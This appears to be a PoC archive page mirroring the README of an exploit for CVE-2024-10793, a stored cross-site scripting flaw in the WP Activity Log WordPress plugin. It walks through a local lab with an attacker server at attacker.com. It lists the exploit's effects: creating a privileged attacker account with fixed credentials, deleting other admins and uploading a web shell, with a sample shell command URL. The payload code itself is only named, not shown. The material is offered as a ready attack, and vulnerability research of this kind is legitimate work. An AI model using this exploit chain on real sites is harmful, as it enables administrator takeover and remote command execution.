Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-10793 PoC — WP Activity Log <= 5.2.1 - Unauthenticated Stored Cross-Site Scripting via User_id Parameter

Source
https://github.com/MAHajian/CVE-2024-10793
Associated Vulnerability
Title:WP Activity Log <= 5.2.1 - Unauthenticated Stored Cross-Site Scripting via User_id Parameter (CVE-2024-10793)
Description:The WP Activity Log plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user_id parameter in all versions up to, and including, 5.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrative user accesses an injected page.
Readme
# CVE-2024-10793 PoC


Set this lines to your `hosts` file:
```
127.0.0.1  goodcms.lab
127.0.0.1  attacker.com
```


Launch Wordpress using docker:
```shell
$ sudo systemctl start docker
$ sudo docker-compose up -d
```


Open http://goodcms.lab:2121 and do installation wordpress steps.
Install wp-security-audit-log.5.2.1 or older versions in wordpress.


Launch attacker server:
```shell
$ php -S 0:9091 -t ./exploit
```


Deliver http://attacker.com to victim & Bingo!

Exploit Impacts:
- Add privileged user.
- Change current admin profile
- Delete all admins except hacker :)
- Shell Upload
- Logout


![alt text](./images/PoC.png)


Account Takeover & Create Privileged User Poc:
Attacker credentials after exploit: { email: amin@attacker.com, username: amin, password: 123456 } (You can change from xpl.js code.)

Run Shell Command:
http://goodcms.lab:2121/wp-content/plugins/sogrid/shell.php?cmd=id

![alt text](./images/shell-PoC.png)
File Snapshot

 [4.0K]  /data/pocs/893ea0d2cc185dbfd5425d2152cb19540c97b75d
├── [2.1K]  docker-compose.yml
├── [4.0K]  exploit
│   ├── [1.5K]  index.php
│   ├── [1.4M]  shell.zip
│   └── [ 10K]  xpl.js
├── [4.0K]  images
│   ├── [187K]  PoC.png
│   └── [ 30K]  shell-PoC.png
├── [1.1K]  LICENSE
├── [ 450]  Makefile
├── [ 943]  README.md
├── [1.6K]  wp-auto-config.yml
└── [1.8M]  wp-security-audit-log.5.2.1.zip

2 directories, 11 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →